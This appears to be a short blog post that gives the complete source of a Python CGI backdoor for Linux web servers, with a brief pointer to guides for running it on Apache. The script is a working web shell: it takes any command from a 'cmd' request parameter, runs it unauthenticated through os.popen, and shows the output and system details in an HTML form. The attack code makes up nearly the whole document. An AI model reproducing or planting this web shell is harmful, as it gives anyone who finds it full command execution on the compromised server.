CGI Backdoor for Linux with Python
#!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.findall(dirt+'(.*)',prognm)[0] osinf = os.uname() info='''==================================== CGI python backdoor ==================================== Author : otoy Date : 0x102010 Blog : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a> ==================================== System : %s %s ==================================== ''' %(osinf[0], osinf[2]) print "Content-type: text/html" print print""" <html> <head> <title>CGI python backdoor</title> </head> <body> <pre>%s</pre> <form action='%s'> Command <input type='text' name='cmd' /> <input type='submit' /> </form> <pre>%s</pre> </body> </html> """ %(info,progfl,osexe.read())
PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.